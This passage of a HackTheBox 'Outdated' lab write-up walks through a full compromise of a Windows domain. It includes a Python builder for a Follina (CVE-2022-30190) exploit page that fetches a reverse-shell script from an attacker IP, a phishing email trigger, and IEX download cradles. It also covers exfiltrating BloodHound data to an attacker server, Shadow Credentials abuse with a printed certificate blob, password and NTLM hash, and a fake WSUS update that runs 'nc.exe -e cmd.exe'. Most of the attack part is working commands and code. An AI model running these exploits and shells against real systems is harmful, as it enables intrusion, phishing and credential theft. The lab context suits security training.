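    'IT_BrowseForFile=h$({launcher})i/../../../../../../../../../../../../../../'
    'Windows/SYstem32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\"'
)

HTML_TEMPLATE = """<!doctype html>
<html lang="en">
<head>
<title>
Exploit
</title>
</head>
<body>
<script>
{padding}
window.location.href = "{url}";
</script>
</body>
</html>
"""

# Characters the launcher must never contain literally: whitespace breaks the
# msdt parameter list, and the PoC spells ':' and '"' as [char]58 / [char]34.
FORBIDDEN = re.compile(r'[\s:"]')


def encode_command(command):
    """Base64 of the UTF-8 bytes.  The launcher decodes with
    [System.Text.Encoding]::UTF8, so this is not the UTF-16LE form that
    powershell.exe -EncodedCommand would expect."""
    return base64.b64encode(command.encode("utf-8")).decode("ascii")


def build_launcher(command):
    """The write-up's Invoke-Expression wrapper around the Base64 blob."""
    b64 = encode_command(command)
    launcher = (
        "Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58"
        "+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('"
        "+[char]34+'" + b64 + "'+[char]34+'))')))"
    )
    bad = FORBIDDEN.search(launcher)
    if bad:  # cannot happen with Base64, but guards edits to the wrapper itself
        raise ValueError(f"launcher contains forbidden character {bad.group()!r}")
    return launcher


def decode_launcher(launcher):
    """Recover the original command from a launcher: a sanity check before sending."""
    m = re.search(r"\[char\]34\+'([A-Za-z0-9+/=]+)'\+\[char\]34", launcher)
    if not m:
        raise ValueError("no Base64 blob found in launcher")
    return base64.b64decode(m.group(1)).decode("utf-8")


def build_exploit_html(launcher, min_size=4096):
    """exploit.html with the PoC's comment padding.  The public PoCs pad the
    file because the redirect does not fire for files under roughly 4 KB."""
    url = MSDT_TEMPLATE.format(launcher=launcher)
    pad_line = "//" + "A" * 68
    padding = []
    html_doc = HTML_TEMPLATE.format(padding="", url=url)
    while len(html_doc.encode("utf-8")) < min_size:
        padding.append(pad_line)
        html_doc = HTML_TEMPLATE.format(padding="\n".join(padding), url=url)
    return html_doc


if __name__ == "__main__":
    cmd = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.7/Invoke-PowerShellTcp.ps1")'
    launcher = build_launcher(cmd)
    with open("exploit.html", "w", newline="\n") as f:
        f.write(build_exploit_html(launcher))
    print("wrote exploit.html; launcher decodes to:", decode_launcher(launcher))
```

Serve the resulting exploit.html and Invoke-PowerShellTcp.ps1 from the same web root on 10.10.16.7 and start the netcat listener on 1234 before sending the mail.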
Getting Reverse Shell
Trigger the exploit with:
sendemail -f most@xeon.com -t itsupport@outdated.htb -u "Click on link" -m "http://10.10.16.7/exploit.html" -s 10.10.11.175:25
- You can ignore the error in powershell, it will not affect the reverse shell.
Finding Possible Privilege Escalation
Dumping Domain Information Using BloodHound
Now I'll collect Active Directory information with SharpHound.ps1 and analyse it in BloodHound:
IEX(New-Object Net.WebClient).DownloadString("http://10.10.16.3:8000/SharpHound.ps1")
Invoke-BloodHound -CollectionMethod All -Domain outdated.htb
To transfer the zip to my Kali machine, I'll use the Invoke-RestMethod PowerShell cmdlet to POST it to a small Python server under my control that writes the request body to disk:
Python3 server script:
#!/usr/bin/env python3
"""
Very simple HTTP server in Python that catches a POST request carrying a file
and writes its body to disk, named after the last component of the request path.
Usage::
./server.py [<port>]
"""
import logging
import os
from http.server import BaseHTTPRequestHandler, HTTPServer


class S(BaseHTTPRequestHandler):
    def _set_response(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        self._set_response()
        self.wfile.write("No Get".encode('utf-8'))

    def do_POST(self):
        # Invoke-RestMethod -InFile sends the raw bytes with a Content-Length header
        content_length = int(self.headers.get('Content-Length', 0))
        post_data = self.rfile.read(content_length)
        # keep only the file name so a crafted path cannot write outside the cwd
        filename = os.path.basename(self.path.split('?')[0]) or 'upload.bin'
        with open(filename, 'wb') as f:
            f.write(post_data)
        logging.info("Wrote %d bytes to %s", len(post_data), filename)
        self._set_response()
        self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))


def run(server_class=HTTPServer, handler_class=S, port=8080):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info('Starting httpd on port %d...', port)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    logging.info('Stopping httpd...')


if __name__ == '__main__':
    from sys import argv
    if len(argv) == 2:
        run(port=int(argv[1]))
    else:
        run()
Invoke-RestMethod -Uri "http://10.10.16.3:8080/20221214212009_BloodHound.zip" -Method Post -InFile "20221214212009_BloodHound.zip" -UseDefaultCredentials
Importing data in BloodHound:
Finding AddKeyCredentialLink For User SFLOWERS
Since I have command execution as btables, I'll mark that user as owned and query Shortest Paths from Owned Principals:
btables is a member of the ITSTAFF group, which has AddKeyCredentialLink over the sflowers user. That means btables can write the msDS-KeyCredentialLink attribute of SFLOWERS@OUTDATED.HTB, i.e. add Shadow Credentials to that object and then authenticate as sflowers with Kerberos PKINIT.
- msDS-KeyCredentialLink (the "kcl") links a public key, from an RSA key pair the attacker generates, to a user or computer object, so that the matching private key can be used to authenticate to the KDC with PKINIT and receive a TGT. The kcl is effectively a set of alternate credentials that works alongside the account's password without changing it.
Escalating To SFLOWERS Using Whisker
I'll use Whisker, a tool that implements exactly this attack.
Compiling Whisker
Whisker does not ship pre-compiled, so I need a Windows machine to build it; I'll use the Commando VM.
I can compile it either from the Visual Studio IDE or with MSBuild from the command line, but either way I need the Visual Studio Installer and its build tools.
After installing Visual Studio Installer, these are the required tools to download:
Now I can compile the binary using the following commands:
git clone https://github.com/eladshamir/Whisker.git
cd Whisker
"C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin\MSBuild.exe" /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /p:TrimUnusedDependencies=true Whisker.sln
- If you're using Visual Studio 2022 the steps are the same except for the path of MSBuild.exe, which differs depending on where the newer version stores it.
Executing Whisker
Uploading Whisker to the target machine:
Executing Whisker:
.\Whisker.exe add /target:sflowers
This will give me a new command to run using Rubeus, so I need to upload this tool to the target machine as well:
However, since my shell is Invoke-PowerShellTcp.ps1, the length of a single command line is limited, so simply pasting this long command will not work. Instead I'll copy it into a PowerShell script and execute that:
$ cat whisker_command.ps1
.\Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"ovojsJ9blcegavO1" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
Running the script:
.\whisker_command.ps1
Gaining Access As SFLOWERS And Reading User Flag
Now that I have a Ticket Granting Ticket and the NTLM hash for the user sflowers, I can either use impacket-psexec (with the -k flag to use the TGT), or Evil-WinRM (with the hash) to access the machine and read the user flag.
In my case I’ll use Evil-WinRM:
evil-winrm -i outdated.htb --hash 1FCDB1F6015DCB318CC77BB2BDA14DB5 -u sflowers
Now, I’ll use WinPEAS to look for possible vulnerabilities or misconfigurations allowing me to escalate to Administrator:
Searching For Possible Ways To Escalate To System
Executing WinPEAS:
.\winPEASx64.exe
Finding WSUS Misconfiguration
WinPEAS reports that the server might be vulnerable to a WSUS attack:
- WSUS, Windows Server Update Services, distributes updates, fixes and other releases from Microsoft Update through one or more WSUS servers. This centralises the job and gives administrators control over which updates are released to clients, instead of each machine downloading updates from the internet on its own.
- WSUS attack: the attack takes advantage of updates being requested over HTTP instead of HTTPS, which lets an attacker inject fake, malicious updates into the unencrypted (non-SSL) WSUS traffic and gain control of the machine.
Checking the registry keys manually:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
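Added example, not part of the original write-up: a small Python audit that parses the output of the two reg query commands above and classifies the WSUS client policy, flagging the plain-HTTP case that WinPEAS warns about. The registry output and the server name wsus.example.internal are constructed placeholders, since the write-up does not reproduce the real values, and the function names parse_reg_query and assess_wsus are mine.

```python
"""Classify a host's WSUS client policy from `reg query` output.

Added example (not the write-up's own code). The sample output below is
constructed; wsus.example.internal is a placeholder server name.
"""
import re
from urllib.parse import urlsplit

# Constructed sample of `reg query ...\WindowsUpdate /v WUServer` on a host
# pointed at a WSUS server over plain HTTP (the vulnerable case).
SAMPLE_WUSERVER = """
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate
    WUServer    REG_SZ    http://wsus.example.internal:8530

"""

# Constructed sample of `reg query ...\WindowsUpdate\AU /v UseWUServer`.
SAMPLE_USEWUSERVER = """
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU
    UseWUServer    REG_DWORD    0x1

"""

# What reg.exe prints when the policy value does not exist at all.
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value."

# Value lines are indented: "<name> <REG_TYPE> <data>"; key headers are not.
_VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")


def parse_reg_query(output: str) -> dict:
    """Return {value_name: (reg_type, data)} parsed from reg query text."""
    values = {}
    for line in output.splitlines():
        m = _VALUE_RE.match(line)
        if m:
            name, reg_type, data = m.groups()
            values[name] = (reg_type, data)
    return values


def reg_dword(data: str) -> int:
    """REG_DWORD data is printed in hex, e.g. 0x1."""
    return int(data, 16)


def assess_wsus(wuserver_output: str, usewuserver_output: str) -> dict:
    """Return status ('not_configured', 'disabled', 'insecure_http', 'https'),
    the WUServer URL if present, and a one-line explanation."""
    wu = parse_reg_query(wuserver_output)
    au = parse_reg_query(usewuserver_output)
    server = wu.get("WUServer", (None, None))[1]

    # UseWUServer=1 is what makes clients honour WUServer at all.
    if "UseWUServer" not in au:
        return {"status": "not_configured", "server": server,
                "detail": "UseWUServer is not set; clients use Microsoft Update directly."}
    if reg_dword(au["UseWUServer"][1]) != 1:
        return {"status": "disabled", "server": server,
                "detail": "UseWUServer=0; WUServer is ignored."}
    if server is None:
        return {"status": "not_configured", "server": None,
                "detail": "UseWUServer=1 but no WUServer URL is set."}

    scheme = urlsplit(server).scheme.lower()
    if scheme == "http":
        return {"status": "insecure_http", "server": server,
                "detail": "Updates are fetched over plain HTTP, so update traffic can be "
                          "tampered with on the path. Change WUServer to an https:// URL."}
    if scheme == "https":
        return {"status": "https", "server": server,
                "detail": "WSUS traffic is TLS-protected; confirm the server certificate chain is trusted."}
    return {"status": "not_configured", "server": server,
            "detail": f"Unrecognised WUServer scheme '{scheme}'."}


if __name__ == "__main__":
    # Run against the constructed samples; on a real host feed in the output
    # of the two reg query commands instead.
    result = assess_wsus(SAMPLE_WUSERVER, SAMPLE_USEWUSERVER)
    print(result["status"], result["server"])
    print(result["detail"])
```

On a real host, capture the two reg query results to files and pass their contents to assess_wsus; the only finding that matters for this attack is insecure_http with UseWUServer enabled, which is exactly the combination WinPEAS flagged here.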
Exploiting WSUS Using SharpWSUS
I tried several tools, but for some reason only SharpWSUS and Wsuspendu worked for me.
- Wsuspendu’s repository has since been deleted (the technique was demonstrated in this Black Hat paper), so here I’ll perform the attack using SharpWSUS.
Compiling SharpWSUS
First, I need to compile it on my Windows Commando VM and copy the binary to Kali, so I’ll open a cmd prompt and issue the following commands:
git clone https://github.com/nettitude/SharpWSUS.git
cd SharpWSUS
"C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin\MSBuild.exe" /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /p:TrimUnusedDependencies=true SharpWSUS.sln
Creating Fake Update And Waiting For Reverse Shell
I also need to transfer the Microsoft-signed PsExec.exe binary. WSUS will not run a binary unless it is signed by Microsoft, and the binaries in the PsTools suite are, so PsExec.exe is what lets me run an arbitrary command.
This is how the tool works:
- First, I create the update with the command to run appended; in this case PsExec launches Netcat (nc.exe) to get a reverse shell:
.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\PsExec.exe" /args:" -accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd.exe 10.10.16.24 8989" /title:"Xeon Update"
- Next, I need to approve the update (the /groupname flag is required, or it will not work):
.\SharpWSUS.exe approve /updateid:137147af-1494-4067-94cf-9da1aeca5d41 /computername:dc.outdated.htb /groupname:"Xeons Group"
- Finally, I can check whether the update has been installed:
.\SharpWSUS.exe check /updateid:137147af-1494-4067-94cf-9da1aeca5d41 /computername:dc.outdated.htb
Uploading nc.exe to target:
Creating the update:
Approving the update:
Checking the update (not installed yet):
Waiting for a while before checking the update again (installed):
Getting System Shell And Reading Root Flag
Getting an nt authority\system shell and reading the root.txt flag:
HackTheBox Windows Active-Directory Smbclient SMTP Sendemail Phishing CVE-2022-30190 Invoke-PowerShellTcp BloodHound SharpHound.ps1 Invoke-RestMethod-Transfer-Files Shadow-Credentials Whisker Rubeus Evil-WinRM WinPEAS WSUS-Attack SharpWSUS
2738 Words
2022-12-08 21:57